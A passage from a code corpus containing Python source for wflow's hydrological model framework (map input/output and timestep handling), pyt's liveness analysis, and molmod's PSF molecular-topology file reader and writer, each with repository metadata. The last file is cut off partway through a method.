:return x-coordinates of the current clone map:
Missing value is -999
"""
x = pcr.xcoordinate((pcr.spatial(pcr.boolean(1.0))))
retval = pcr.pcr_as_numpy(x).copy()
return np.flipud(retval).copy()
def wf_supplyMapYAsNumpy(self):
"""
:return y-coordinates of the current clone map:
Missing value is -999
"""
y = pcr.ycoordinate((pcr.spatial(pcr.boolean(1.0))))
retval = pcr.pcr_as_numpy(y).copy()
return np.flipud(retval).copy()
def wf_supplyMapZAsNumpy(self):
"""
:return z-coordinates of the current clone map:
Assumes an Altitude map is present, otherwise return empty numpy
Missing value is -999
"""
if hasattr(self._userModel(), "Altitude"):
retval = getattr(self._userModel(), "Altitude")
return np.flipud(pcr.pcr2numpy(retval, -999)).copy()
else:
self.logger.warning(
"Altitude is not defined in the usermodel, returning empty list"
)
return []
def wf_supplyMapOrigin(self):
"""
:return: lower left corner of the map as X, Y
"""
a = pcr.boolean(1)
Y = self.wf_supplyMapYAsNumpy()
X = self.wf_supplyMapXAsNumpy()
return np.array([X.flatten.min(), Y.flatten.min()])
def wf_supplyMapAsPcrMap(self, mapname):
"""
Returns a pcrmap for the specified map and the current
timestep. If the maps is not dynamic the current staus of the map is
returns which may be undefined for maps that are filled with data
at the end of a run
Missing value is -999
Input:
- mapname (string)
Output:
- numpy array
"""
if hasattr(self._userModel(), mapname):
retval = getattr(self._userModel(), mapname)
if self.APIDebug:
self.logger.debug("wf_supplyMapAsNumpy returning: " + mapname)
else:
self.logger.warning(
mapname + " is not defined in the usermodel, returning empty list"
)
return []
return retval
def wf_supplyGridDim(self):
"""
return the dimension of the current model grid as list::
[ Xul, Yul, xsize, ysize, rows, cols, Xlr, Ylr]
"""
return getgridparams()
def wf_supplyVariableNamesAndRoles(self):
"""
Returns a list of variables
List of list with the following structure::
[[ name, role, unit]
[ name, role, unit]
...
]
role: 0 = input (to the model)
1 = is output (from the model)
2 = input/output (state information)
3 = model parameter
unit: 0 = mm/timestep
1 = m^3/sec
2 = m
3 = degree Celcius
4 = mm
5 = -
The first time this function is called the exchangeitems object is filled
with data from the ini file.
"""
res = self.exchnageitems.getvars()
# Fill object with data from ini file
# TODO: clean up!!
if len(res) == 0:
API = configsection(self._userModel().config, "API")
for a in API:
tt = []
line = self._userModel().config.get("API", a)
tt.append(a)
tt.append(int(line.split(",")[0]))
tt.append((line.split(",")[1]))
res.append(tt)
self.exchnageitems.addvar(tt[0], tt[1], tt[2])
if hasattr(self._userModel(), "supplyVariableNamesAndRoles"):
if self.APIDebug:
res = self._userModel().supplyVariableNamesAndRoles()
self.logger.debug(
"wf_supplyVariableNamesAndRoles from usermodel: " + str(res)
)
return res
else:
if self.APIDebug:
self.logger.debug(
"wf_supplyVariableNamesAndRoles from framework: " + str(res)
)
return res
def wf_supplyVariableNames(self):
"""
returns:
- the a list of variable names
"""
varlist = self.wf_supplyVariableNamesAndRoles()
ret = list(range(len(varlist)))
for ss in range(len(varlist)):
ret[ss] = varlist[ss][0]
if self.APIDebug:
self.logger.debug("wf_supplyVariableNames from framework: " + str(ret))
return ret
def wf_supplyVariableRoles(self):
"""
returns:
- the a list of variable roles
"""
varlist = self.wf_supplyVariableNamesAndRoles()
ret = list(range(len(varlist)))
for ss in range(len(varlist)):
ret[ss] = varlist[ss][1]
if self.APIDebug:
self.logger.debug("wf_supplyVariableRoles from framework: " + str(ret))
return ret
def wf_supplyVariableCount(self):
"""
returns:
- the number of exchangable variables
"""
varlist = self.wf_supplyVariableNamesAndRoles()
if self.APIDebug:
self.logger.debug(
"wf_supplyVariableCount from framework: " + str(len(varlist))
)
return len(varlist)
def wf_supplyVariableUnits(self):
"""
returns:
- the a list of variable units
"""
varlist = self.wf_supplyVariableNamesAndRoles()
ret = list(range(len(varlist)))
for ss in range(len(varlist)):
ret[ss] = varlist[ss][2]
if self.APIDebug:
self.logger.debug("wf_supplyVariableUnits from framework: " + str(ret))
return ret
def wf_supplyEndTime(self):
"""
gets the end time of the model run
:return: current time as seconds since epoch
"""
seconds_since_epoch = calendar.timegm(self.DT.runEndTime.utctimetuple())
return seconds_since_epoch
def wf_supplyStartTime(self):
"""
gets the start time of the model run
:return: current time as seconds since epoch
"""
seconds_since_epoch = calendar.timegm(self.DT.runStartTime.utctimetuple())
return seconds_since_epoch
def wf_supplyCurrentTime(self):
"""
gets the current time in seconds after the start of the run
Assumed daily timesteps if not defined in the user model
Output:
- current model time (since start of the run)
"""
dtt = self.DT.currentDateTime
seconds_since_epoch = calendar.timegm(dtt.utctimetuple())
return seconds_since_epoch
def wf_supplyCurrentDateTime(self):
"""
gets the current time in seconds after the start of the run
Assumed daily timesteps if not defined in the user model
Output:
- current model time (since start of the run)
"""
dtt = self.DT.currentDateTime
return dtt
def wf_supplyStartDateTime(self):
"""
gets the current time in seconds after the start of the run
Assumed daily timesteps if not defined in the user model
Output:
- current model time (since start of the run)
"""
dtt = self.DT.runStartTime
return dtt
def wf_supplyEpoch(self):
"""
Supplies the time epoch as a CF string
Output:
- current model time (since start of the run)
"""
epoch = time.gmtime(0)
epochstr = "seconds since %04d-%02d-%02d %02d:%02d:%02d.0 00:00" % (
epoch.tm_year,
epoch.tm_mon,
epoch.tm_mday,
epoch.tm_hour,
epoch.tm_min,
epoch.tm_sec,
)
return epochstr
def wf_supplyRowCol(self, mapname, xcor, ycor):
"""
returns a tuple (Row,Col) for the given X and y coordinate
Input:
- mapname
- xcor
- ycor
Output:
- tuple with row, col
"""
pt = getRowColPoint(mapname, xcor, ycor)
if self.APIDebug:
self.logger.debug("wf_supplyRowCol from framework: " + str(pt))
return pt
def wf_supplyScalar(self, mapname, xcor, ycor):
"""
returns a single value for the x and y coordinates from the
map given uses getValAtPoint(in_map,xcor,ycor) from terrain_lib.py
Input:
- mapname
- xcor
- ycor
Output:
- value at location xcor, ycor
"""
pcmap = getattr(self._userModel(), mapname)
pt = getValAtPoint(pcmap, xcor, ycor)
if self.APIDebug:
self.logger.debug("wf_supplyScalar from framework: " + str(pt))
return pt
def wf_supplyScalarRowCol(self, mapname, row, col):
"""
returns a single value for row and col from the
map given (zero based).
Input:
- mapname
- xcor
- ycor
Output:
- value at location row, col
"""
pcmap = getattr(self._userModel(), mapname)
ret = pcr.cellvalue(pcmap, row + 1, col + 1)
return ret[0]
def _userModel(self):
""" Returns the class provided by the user """
return self._d_model
def _runDynamic(self, firststep, laststep):
"""
Runs the dynamic model from firststep to laststep
Input:
:ivar firststep: first timestep of the model run
:ivar laststep: last timestep of the model run
"""
self._userModel()._setInDynamic(True)
#
if firststep == 0:
step = self._d_firstTimestep
else:
step = firststep
if laststep == 0:
laststep = self._d_lastTimestep
self._userModel()._setNrTimeSteps(int(laststep))
self.DT.update(
currentTimeStep=self.DT.currentTimeStep, mode=self.runlengthdetermination
)
while step <= self._userModel().nrTimeSteps():
self._incrementIndentLevel()
self._atStartOfTimeStep(step)
self._userModel()._setCurrentTimeStep(step)
if hasattr(self._userModel(), "dynamic"):
self._incrementIndentLevel()
self._traceIn("dynamic")
self._userModel().dynamic()
self._traceOut("dynamic")
self._decrementIndentLevel()
# Save state variables in memory
self.wf_QuickSuspend()
# Make the summary variables
for a in range(0, len(self.statslst)):
data = getattr(self._userModel(), self.statslst[a].varname)
self.statslst[a].add_one(data)
# Online statistics (rolling mean for now)
for key in self.onlinestat.statvarname:
stvar = self.onlinestat.getstat(getattr(self._userModel(), key), key)
# stvar = self.onlinestat.getstat(pcr.cover(self.DT.currentTimeStep * 1.0), key)
setattr(self._userModel(), self.onlinestat.statvarname[key], stvar)
# Increment one timesteps
self.DT.update(incrementStep=True, mode=self.runlengthdetermination)
self._userModel().currentdatetime = self.DT.currentDateTime
self.wf_savedynMaps()
self.wf_saveTimeSeries()
self.logger.debug(
"timestep: "
+ str(self._userModel().currentTimeStep())
+ "/"
+ str(self.DT.lastTimeStep)
+ " ("
+ str(self.DT.currentDateTime)
+ ")"
)
self._timeStepFinished()
self._decrementIndentLevel()
step += 1
self.setviaAPI = {}
self._userModel()._setInDynamic(False)
## \brief Re-implemented from ShellScript.
#
# Runs a dynamic user model.
def run(self):
""" Runs the dynamic model for all timesteps """
self._atStartOfScript()
if hasattr(self._userModel(), "resume"):
if self._userModel().firstTimeStep() == 1:
self._runInitial()
else:
self._runResume()
else:
self._runInitial()
self._runDynamic()
# only execute this section while running filter frameworks
if hasattr(self._userModel(), "suspend") and hasattr(
self._userModel(), "filterPeriod"
):
self._runSuspend()
return 0
def reportStatic(self, variable, name, style=1, gzipit=False, longname=None):
"""
:param variable:
:param name:
:param style:
:param gzipit:
:param longname:
:return:
"""
if longname == None:
longname = name
path = name
if self.outputFormat == 1:
if not hasattr(self, "NcOutputStatic"):
pcr.report(variable, path)
if gzipit:
Gzip(path, storePath=True)
else:
self.NcOutputStatic.savetimestep(1, variable, var=name, name=longname)
elif self.outputFormat == 2:
np.savez(path, pcr.pcr2numpy(variable, -999))
elif self.outputFormat == 3:
np.savez(path, pcr.pcr2numpy(variable, -999))
elif self.outputFormat == 4:
np.savetxt(path, pcr.pcr2numpy(variable, -999), fmt="%0.6g")
def reportState(self, variable, name, style=1, gzipit=False, longname=None):
"""
:param variable:
:param name:
:param style:
:param gzipit:
:param longname:
:return:
"""
if longname == None:
longname = name
path = name
if self.outputFormat == 1:
if not hasattr(self, "NcOutputState"):
pcr.report(variable, path)
if gzipit:
Gzip(path, storePath=True)
else:
self.NcOutputState.savetimestep(1, variable, var=name, name=longname)
elif self.outputFormat == 2:
np.savez(path, pcr.pcr2numpy(variable, -999))
elif self.outputFormat == 3:
np.savez(path, pcr.pcr2numpy(variable, -999))
elif self.outputFormat == 4:
np.savetxt(path, pcr.pcr2numpy(variable, -999), fmt="%0.6g")
def _reportNew(self, variable, name, style=1, gzipit=False, longname=None):
"""
outputformat: (set in the [framework] section of the init file).
1: pcraster
2: numpy (compressed)
3: matlab
4: numpy text files (large and slow)
..
# Example:
[framework]
outputformat = 4
"""
if longname == None:
longname = name
head, tail = os.path.split(name)
# if re.search("\.", tail):
# msg = "File extension given in '" + name + "' not allowed, provide filename without extension"
# raise FrameworkError(msg)
directoryPrefix = ""
nameSuffix = ".map"
newName = ""
if hasattr(self._userModel(), "_inStochastic"):
if self._userModel()._inStochastic():
if self._userModel()._inPremc():
newName = name + nameSuffix
elif self._userModel()._inPostmc():
newName = name + nameSuffix
else:
directoryPrefix = str(self._userModel().currentSampleNumber())
if self._userModel()._inInitial():
newName = name + nameSuffix
if hasattr(self._userModel(), "_inDynamic"):
if self._userModel()._inDynamic() or self._inUpdateWeight():
newName = pcraster.framework.generateNameT(
name, self._userModel().currentTimeStep()
)
if newName == "": # For files from suspend
newName = name
path = os.path.join(directoryPrefix, newName)
if self.outputFormat == 1:
if not hasattr(self, "NcOutput"):
pcr.report(variable, path)
if gzipit:
Gzip(path, storePath=True)
else:
self.NcOutput.savetimestep(
self._userModel().currentTimeStep(),
variable,
var=name,
name=longname,
)
elif self.outputFormat == 2:
np.savez(path, pcr.pcr2numpy(variable, -999))
elif self.outputFormat == 3:
np.savez(path, pcr.pcr2numpy(variable, -999))
elif self.outputFormat == 4:
np.savetxt(path, pcr.pcr2numpy(variable, -999), fmt="%0.6g")
def wf_readmapClimatology(self, name, kind=1, default=0.0, verbose=1):
"""
Read a climatology map. The current date/time is converted to:
1: a month and the file for the current month is returned
2: days of year and the file for the current day is returned
3: hour of day and the file for the current hours is returned
:param name: name if the mapstack
:param kind: type of the climatology
:return: a map
"""
# Assume the variable is via the API (replaces the
if os.path.basename(name) in self.setviaAPI:
self.setviaAPI.pop(os.path.basename(name))
self.logger.debug(
os.path.basename(name)
+ " set via API, not reading from file, using memory copy"
)
return getattr(self._userModel(), os.path.basename(name))
# TODO: Add support for netcdf files
directoryPrefix = ""
if kind == 1:
month = self.DT.currentDateTime.month
newName = pcraster.framework.generateNameT(name, month)
path = os.path.join(directoryPrefix, newName)
if os.path.isfile(path):
mapje = pcr.readmap(path)
return mapje
else:
if verbose:
self.logger.warning(
"Climatology data ("
+ path
+ ") for timestep not present, returning "
+ str(default)
)
return pcr.scalar(default)
elif kind == 2:
yday = self.DT.currentDateTime.timetuple().tm_yday
newName = pcraster.framework.generateNameT(name, yday)
path = os.path.join(directoryPrefix, newName)
if os.path.isfile(path):
mapje = pcr.readmap(path)
return mapje
else:
if verbose:
self.logger.warning(
"Climatology data ("
+ path
+ ") for timestep not present, returning "
+ str(default)
)
return pcr.scalar(default)
else:
self.logger.error(
"This Kind of climatology not implemented yet: " + str(kind)
)
def wf_readmap(
self,
name,
default,
verbose=True,
fail=False,
ncfilesource="not set",
silent=False,
):
"""
Adjusted version of readmapNew. the style variable is used to indicated
how the data is read::
1 - default: reads pcrmaps
2 - memory: assumes the map is made available (in memory) using
the in-memory interface
"""
directoryPrefix = ""
nameSuffix = ".map"
newName = ""
varname = os.path.basename(name)
# find if this is an exchnageitem
thevars = self.exchnageitems.getvars()
if len(thevars) == 0:
self.wf_supplyVariableNamesAndRoles()
style = self.exchnageitems.getvarStyle(varname)
# set this for initial (before the model is actually running)
if os.path.splitext(name)[1] == ".map":
newName = name
else:
newName = name + nameSuffix
# Assume the variable is via the API (replaces the
if os.path.basename(name) in self.setviaAPI:
self.setviaAPI.pop(os.path.basename(name))
self.logger.debug(
os.path.basename(name)
+ " set via API, not reading from file, using memory copy"
)
return getattr(self._userModel(), os.path.basename(name))
if hasattr(self._userModel(), "_inStochastic"):
if self._userModel()._inStochastic():
if self._userModel()._inPremc() or self._userModel()._inPostmc():
newName = name + nameSuffix
else:
directoryPrefix = str(self._userModel().currentSampleNumber())
if hasattr(self._userModel(), "_inInitial"):
if self._userModel()._inInitial():
if os.path.splitext(name)[1] == ".map":
newName = name
else:
newName = name + nameSuffix
if self._inResume():
if os.path.splitext(name)[1] == ".map":
newName = name
else:
newName = name + nameSuffix
if hasattr(self._userModel(), "_inDynamic"):
if self._userModel()._inDynamic() or self._inUpdateWeight():
timestep = self._userModel().currentTimeStep()
# print timestep
if "None" not in self.ncfile:
newName = name
else:
newName = pcraster.framework.generateNameT(name, timestep)
if style == 1: # Normal reading of mapstack from DISK per via or via netcdf
path = os.path.join(directoryPrefix, newName)
assert path is not ""
if self._userModel()._inDynamic():
if "None" not in self.ncfile:
retval, succ = self.NcInput.gettimestep(
self._userModel().currentTimeStep(),
self.logger,
tsdatetime=self.DT.nextDateTime,
var=varname,
shifttime=self.DT.startadjusted,
)
if succ:
return retval
else:
return pcr.cover(pcr.scalar(default))
if os.path.isfile(path):
mapje = pcr.readmap(path)
return mapje
else:
if verbose:
self.logger.debug(
"Input data ("
+ os.path.abspath(path)
+ ") for timestep not present, returning "
+ str(default)
)
if fail:
self.logger.error(
"Required map: "
+ os.path.abspath(path)
+ " not found, exiting.."
)
raise ValueError("Input map not found")
return pcr.cover(pcr.scalar(default))
elif self._userModel()._inInitial():
if "None" not in self.ncfilestatic:
retval, succ = self.NcInputStatic.gettimestep(
1, self.logger, var=varname
)
if succ:
return retval
else:
if fail:
if not silent:
self.logger.error(
"Required map: "
+ os.path.abspath(path)
+ " not found in "
+ self.ncfilestatic
+ " exiting.."
)
raise ValueError(
"Input static variable not found in netcdf"
)
else:
return self.TheClone + default
if os.path.isfile(path):
mapje = pcr.readmap(path)
return mapje
else:
if verbose:
self.logger.debug(
"Static input data ("
+ os.path.abspath(path)
+ ") not present, returning "
+ str(default)
)
if fail:
if not silent:
self.logger.error(
"Required map: "
+ os.path.abspath(path)
+ " not found, exiting.."
)
raise ValueError("Input static variable not found")
return self.TheClone + default
elif self._inResume():
if ncfilesource == self.ncinfilestates and ncfilesource not in "None":
retval, succ = self.NcInputStates.gettimestep(
1, self.logger, var=varname, tsdatetime=self.DT.runStateTime
)
if succ:
return retval
else:
if fail:
if not silent:
self.logger.error(
"Required map: "
+ os.path.abspath(path)
+ " not found, exiting.."
)
raise ValueError("Input state variable not found")
return self.TheClone + default
if os.path.isfile(path):
mapje = pcr.readmap(path)
return mapje
else:
if verbose:
self.logger.debug(
"State input data ("
+ os.path.abspath(path)
+ ") not present, returning "
+ str(default)
)
if fail:
if not silent:
self.logger.error(
"Required map: "
+ os.path.abspath(path)
+ " not found, exiting.."
)
raise ValueError("Input state variable not found")
return pcr.cover(pcr.scalar(default))
else: # Assuming we are in pre-or post loop within the framwork
if "None" not in self.ncfilestatic:
retval, succ = self.NcInputStatic.gettimestep(
1, self.logger, var=varname
)
if succ:
return retval
else:
if fail:
if not silent:
self.logger.error(
"Required map: "
+ os.path.abspath(path)
+ " not found in "
+ self.ncfilestatic
+ " exiting.."
)
raise ValueError("Input variable not found in netcdf")
else:
return self.TheClone + default
if os.path.isfile(path):
mapje = pcr.readmap(path)
return mapje
else:
if verbose:
self.logger.debug(
"Static input data ("
+ os.path.abspath(path)
+ ") not present, returning "
+ str(default)
)
if fail:
if not silent:
self.logger.error(
"Required map: "
+ os.path.abspath(path)
+ " not found, exiting.."
)
raise ValueError("Input variable not found")
return self.TheClone + default
elif style == 2: # Assuming they are set in memory by the API
#
# first get basename (last bit of path)
name = os.path.basename(name)
if hasattr(self._userModel(), name):
return pcr.cover(getattr(self._userModel(), name), pcr.scalar(default))
else:
self.logger.warning(
"Variable: " + name + " not set by API, returning default"
)
setattr(self._userModel(), name, pcr.cover(pcr.scalar(default)))
return getattr(self._userModel(), name)
else:
self.logger.warning(
"Unknown style ("
+ str(style)
+ ") for variable: "
+ name
+ ", returning default"
)
return self.TheClone + default
## \brief testing the requirements for the dynamic framework
#
# To use the dynamic framework the user must implement the following methods
# in this class:
# - either "run" or "initial" and "dynamic"
def _testRequirements(self):
if hasattr(self._userModel(), "_userModel"):
msg = "The _userModel method is deprecated and obsolete"
self.showWarning(msg)
if not hasattr(self._userModel(), "dynamic") and not hasattr(
self._userModel(), "run"
):
msg = "Cannot run dynamic framework: Implement dynamic method"
raise frameworkBase.FrameworkError(msg)
if not hasattr(self._userModel(), "initial"):
if self._debug():
self.showWarning("No initial section defined.")
if not hasattr(self._userModel(), "stateVariables"):
if self._debug():
self.showWarning("No stateVariables defined in usermodel.")
def setQuiet(self, quiet):
self._d_quiet = quiet
self._d_quietProgressDots = quiet
|
openstreams/wflow
|
wflow/wf_DynamicFramework.py
|
Python
|
gpl-3.0
| 132,587
|
[
"NetCDF"
] |
0fa0913e5b46a7b7a6e0a45ace56a93561e3412bc2858826d7e1c9bc0d6b027a
|
"""Module implements liveness analysis."""
from cfg import AssignmentNode
from copy import deepcopy
from ast import NodeVisitor, Compare, Call
from analysis_base import AnalysisBase
class LivenessAnalysis(AnalysisBase):
"""Implement liveness analysis rules."""
def __init__(self, cfg):
"""Initialize using parent with the given cfg."""
super(LivenessAnalysis, self).__init__(cfg, VarsVisitor)
def join(self, cfg_node):
"""Join outgoing old constraints and return them as a set."""
JOIN = set()
for outgoing in cfg_node.outgoing:
if outgoing.old_constraint:
JOIN |= outgoing.old_constraint
return JOIN
def fixpointmethod(self, cfg_node):
"""Setting the constraints of the given cfg node obeying the liveness analysis rules."""
# if for Condition and call case: Join(v) u vars(E).
if cfg_node.ast_type == Compare.__name__ or cfg_node.ast_type == Call.__name__:
JOIN = self.join(cfg_node)
JOIN.update(self.annotated_cfg_nodes[cfg_node]) # set union
cfg_node.new_constraint = JOIN
# if for Assignment case: Join(v) \ {id} u vars(E).
elif isinstance(cfg_node, AssignmentNode):
JOIN = self.join(cfg_node)
JOIN.discard(cfg_node.ast_node.targets[0].id) # set difference
JOIN.update(self.annotated_cfg_nodes[cfg_node]) # set union
cfg_node.new_constraint = JOIN
# if for entry and exit cases: {}.
elif cfg_node.ast_type == "ENTRY" or cfg_node.ast_type == "EXIT":
pass
# else for other cases.
else:
cfg_node.new_constraint = self.join(cfg_node)
class VarsVisitor(NodeVisitor):
"""Class that finds all variables needed for the liveness analysis."""
def __init__(self):
"""Initialise list of results."""
self.result = list()
def visit_Name(self, node):
self.result.append(node.id)
# Condition and call rule
def visit_Call(self, node):
for arg in node.args:
self.visit(arg)
for keyword in node.keywords:
self.visit(keyword)
def visit_keyword(self, node):
self.visit(node.value)
def visit_Compare(self, node):
self.generic_visit(node)
# Assignment rule
def visit_Assign(self, node):
self.visit(node.value)
|
SW10IoT/pyt
|
pyt/liveness.py
|
Python
|
gpl-2.0
| 2,474
|
[
"VisIt"
] |
e8b4ba3aeba4f4f8020eab425433cd3efc99b7b65524484092e5106862e94272
|
# -*- coding: utf-8 -*-
# MolMod is a collection of molecular modelling tools for python.
# Copyright (C) 2007 - 2019 Toon Verstraelen <Toon.Verstraelen@UGent.be>, Center
# for Molecular Modeling (CMM), Ghent University, Ghent, Belgium; all rights
# reserved unless otherwise stated.
#
# This file is part of MolMod.
#
# MolMod is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# MolMod is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
"""Tools for reading and writing PSF (Protein Structure File) files
This format is orignally developed in conjunction with the CHARMM program,
but is also used by CP2K as a generic format to define the molecular bond
graph and other topological aspects of a molecular model. This module just
creates files that can be read with CP2K.
Due to the lack of public definition of a PSF file format, several variations
exist. Therefore we do not make any attempt to follow the original format
strictly, nor one of these variations. It would be more interesting to
define a new public standard for molecular topologies, which is also suitable
for non-protein systems.
"""
from __future__ import print_function, division
import numpy as np
from molmod.periodic import periodic
from molmod.units import unified
from molmod.graphs import CriteriaSet, GraphSearch
from molmod.molecular_graphs import MolecularGraph, BondPattern, \
BendingAnglePattern, DihedralAnglePattern, OutOfPlanePattern, \
HasNumNeighbors
from molmod.graphs import Graph
from molmod.io.common import FileFormatError
__all__ = ["PSFFile"]
class PSFFile(object):
"A very simplistic and limited implementation of the PSF file format"
def __init__(self, filename=None):
"""
Argument:
| ``filename`` -- When not given, an empty data structure is
created, otherwise the file is loaded from disk
"""
if filename is None:
self.clear()
else:
self.read_from_file(filename)
def clear(self):
"""Clear the contents of the data structure"""
self.title = None
self.numbers = np.zeros(0, int)
self.atom_types = [] # the atom_types in the second column, used to associate ff parameters
self.charges = [] # ff charges
self.names = [] # a name that is unique for the molecule composition and connectivity
self.molecules = np.zeros(0, int) # a counter for each molecule
self.bonds = np.zeros((0, 2), int)
self.bends = np.zeros((0, 3), int)
self.dihedrals = np.zeros((0, 4), int)
self.impropers = np.zeros((0, 4), int)
self.name_cache = {}
def read_from_file(self, filename):
"""Load a PSF file"""
self.clear()
with open(filename) as f:
# A) check the first line
line = next(f)
if not line.startswith("PSF"):
raise FileFormatError("Error while reading: A PSF file must start with a line 'PSF'.")
# B) read in all the sections, without interpreting them
current_section = None
sections = {}
for line in f:
line = line.strip()
if line == "":
continue
elif "!N" in line:
words = line.split()
current_section = []
section_name = words[1][2:]
if section_name.endswith(":"):
section_name = section_name[:-1]
sections[section_name] = current_section
else:
current_section.append(line)
# C) interpret the supported sections
# C.1) The title
self.title = sections['TITLE'][0]
molecules = []
numbers = []
# C.2) The atoms and molecules
for line in sections['ATOM']:
words = line.split()
self.atom_types.append(words[5])
self.charges.append(float(words[6]))
self.names.append(words[3])
molecules.append(int(words[2]))
atom = periodic[words[4]]
if atom is None:
numbers.append(0)
else:
numbers.append(periodic[words[4]].number)
self.molecules = np.array(molecules)-1
self.numbers = np.array(numbers)
self.charges = np.array(self.charges)
# C.3) The bonds section
tmp = []
for line in sections['BOND']:
tmp.extend(int(word) for word in line.split())
self.bonds = np.reshape(np.array(tmp), (-1, 2))-1
# C.4) The bends section
tmp = []
for line in sections['THETA']:
tmp.extend(int(word) for word in line.split())
self.bends = np.reshape(np.array(tmp), (-1, 3))-1
# C.5) The dihedral section
tmp = []
for line in sections['PHI']:
tmp.extend(int(word) for word in line.split())
self.dihedrals = np.reshape(np.array(tmp), (-1, 4))-1
# C.6) The improper section
tmp = []
for line in sections['IMPHI']:
tmp.extend(int(word) for word in line.split())
self.impropers = np.reshape(np.array(tmp), (-1, 4))-1
def _get_name(self, graph, group=None):
"""Convert a molecular graph into a unique name
This method is not sensitive to the order of the atoms in the graph.
"""
if group is not None:
graph = graph.get_subgraph(group, normalize=True)
fingerprint = graph.fingerprint.tobytes()
name = self.name_cache.get(fingerprint)
if name is None:
name = "NM%02i" % len(self.name_cache)
self.name_cache[fingerprint] = name
return name
def write_to_file(self, filename):
"""Write the data structure to a file"""
with open(filename, 'w') as f:
self.dump(f)
def dump(self, f):
"""Dump the data structure to a file-like object"""
# header
print("PSF", file=f)
print(file=f)
# title
print(" 1 !NTITLE", file=f)
print(self.title, file=f)
print(file=f)
# atoms
print("% 7i !NATOM" % len(self.numbers), file=f)
if len(self.numbers) > 0:
for index, (number, atom_type, charge, name, molecule) in enumerate(zip(self.numbers, self.atom_types, self.charges, self.names, self.molecules)):
atom = periodic[number]
print("% 7i % 4s % 4i NAME % 6s % 6s % 8.4f % 12.6f 0" % (
index + 1,
name,
molecule + 1,
atom.symbol,
atom_type,
charge,
atom.mass/unified,
), file=f)
print(file=f)
# bonds
print("% 7i !NBOND" % len(self.bonds), file=f)
if len(self.bonds) > 0:
tmp = []
for bond in self.bonds:
tmp.extend(bond+1)
if len(tmp) >= 8:
print(" ".join("% 7i" % v for v in tmp[:8]), file=f)
tmp = tmp[8:]
if len(tmp) > 0:
print(" ".join("% 7i" % v for v in tmp), file=f)
print(file=f)
# bends
print("% 7i !NTHETA" % len(self.bends), file=f)
if len(self.bends) > 0:
tmp = []
for bend in self.bends:
tmp.extend(bend+1)
if len(tmp) >= 9:
print(" " + (" ".join("% 6i" % v for v in tmp[:9])), file=f)
tmp = tmp[9:]
if len(tmp) > 0:
print(" " + (" ".join("% 6i" % v for v in tmp)), file=f)
print(file=f)
# dihedrals
print("% 7i !NPHI" % len(self.dihedrals), file=f)
if len(self.dihedrals) > 0:
tmp = []
for dihedral in self.dihedrals:
tmp.extend(dihedral+1)
if len(tmp) >= 8:
print(" " + (" ".join("% 6i" % v for v in tmp[:8])), file=f)
tmp = tmp[8:]
if len(tmp) > 0:
print(" " + (" ".join("% 6i" % v for v in tmp)), file=f)
print(file=f)
# impropers
print("% 7i !NIMPHI" % len(self.impropers), file=f)
if len(self.impropers) > 0:
tmp = []
for improper in self.impropers:
tmp.extend(improper+1)
if len(tmp) >= 8:
print(" " + (" ".join("% 6i" % v for v in tmp[:8])), file=f)
tmp = tmp[8:]
if len(tmp) > 0:
print(" " + (" ".join("% 6i" % v for v in tmp)), file=f)
print(file=f)
# not implemented fields
print(" 0 !NDON", file=f)
print(file=f)
print(" 0 !NNB", file=f)
print(file=f)
print(" 0 !NGRP", file=f)
print(file=f)
def add_molecule(self, molecule, atom_types=None, charges=None, split=True):
"""Add the graph of the molecule to the data structure
The molecular graph is estimated from the molecular geometry based on
interatomic distances.
Argument:
| ``molecule`` -- a Molecule instance
Optional arguments:
| ``atom_types`` -- a list with atom type strings
| ``charges`` -- The net atom charges
| ``split`` -- When True, the molecule is split into disconnected
molecules [default=True]
"""
molecular_graph = MolecularGraph.from_geometry(molecule)
self.add_molecular_graph(molecular_graph, atom_types, charges, split, molecule)
def add_molecular_graph(self, molecular_graph, atom_types=None, charges=None, split=True, molecule=None):
"""Add the molecular graph to the data structure
Argument:
| ``molecular_graph`` -- a MolecularGraph instance
Optional arguments:
| ``atom_types`` -- a list with atom type strings
| ``charges`` -- The net atom charges
| ``split`` -- When True, the molecule is split into disconnected
molecules [default=True]
"""
# add atom numbers and molecule indices
new = len(molecular_graph.numbers)
if new == 0: return
prev = len(self.numbers)
offset = prev
self.numbers = np.resize(self.numbers, prev + new)
self.numbers[-new:] = molecular_graph.numbers
if atom_types is None:
atom_types = [periodic[number].symbol for number in molecular_graph.numbers]
self.atom_types.extend(atom_types)
if charges is None:
charges = [0.0]*len(molecular_graph.numbers)
self.charges.extend(charges)
self.molecules = np.resize(self.molecules, prev + new)
# add names (autogenerated)
if split:
groups = molecular_graph.independent_vertices
names = [self._get_name(molecular_graph, group) for group in groups]
group_indices = np.zeros(new, int)
for group_index, group in enumerate(groups):
for index in group:
group_indices[index] = group_index
self.names.extend([names[group_index] for group_index in group_indices])
if prev == 0:
self.molecules[:] = group_indices
else:
self.molecules[-new:] = self.molecules[-new]+group_indices+1
else:
if prev == 0:
self.molecules[-new:] = 0
else:
self.molecules[-new:] = self.molecules[-new]+1
name = self._get_name(molecular_graph)
self.names.extend([name]*new)
self._add_graph_bonds(molecular_graph, offset, atom_types, molecule)
self._add_graph_bends(molecular_graph, offset, atom_types, molecule)
self._add_graph_dihedrals(molecular_graph, offset, atom_types, molecule)
self._add_graph_impropers(molecular_graph, offset, atom_types, molecule)
def _add_graph_bonds(self, molecular_graph, offset, atom_types, molecule):
# add bonds
match_generator = GraphSearch(BondPattern([CriteriaSet()]))
tmp = sorted([(
match.get_destination(0),
match.get_destination(1),
) for match in match_generator(molecular_graph)])
new = len(tmp)
if new > 0:
prev = len(self.bonds)
self.bonds = np.resize(self.bonds, (prev + len(tmp), 2))
self.bonds[-len(tmp):] = tmp
self.bonds[-len(tmp):] += offset
def _add_graph_bends(self, molecular_graph, offset, atom_types, molecule):
# add bends
match_generator = GraphSearch(BendingAnglePattern([CriteriaSet()]))
tmp = sorted([(
match.get_destination(0),
match.get_destination(1),
match.get_destination(2),
) for match in match_generator(molecular_graph)])
new = len(tmp)
if new > 0:
prev = len(self.bends)
self.bends = np.resize(self.bends, (prev + len(tmp), 3))
self.bends[-len(tmp):] = tmp
self.bends[-len(tmp):] += offset
def _add_graph_dihedrals(self, molecular_graph, offset, atom_types, molecule):
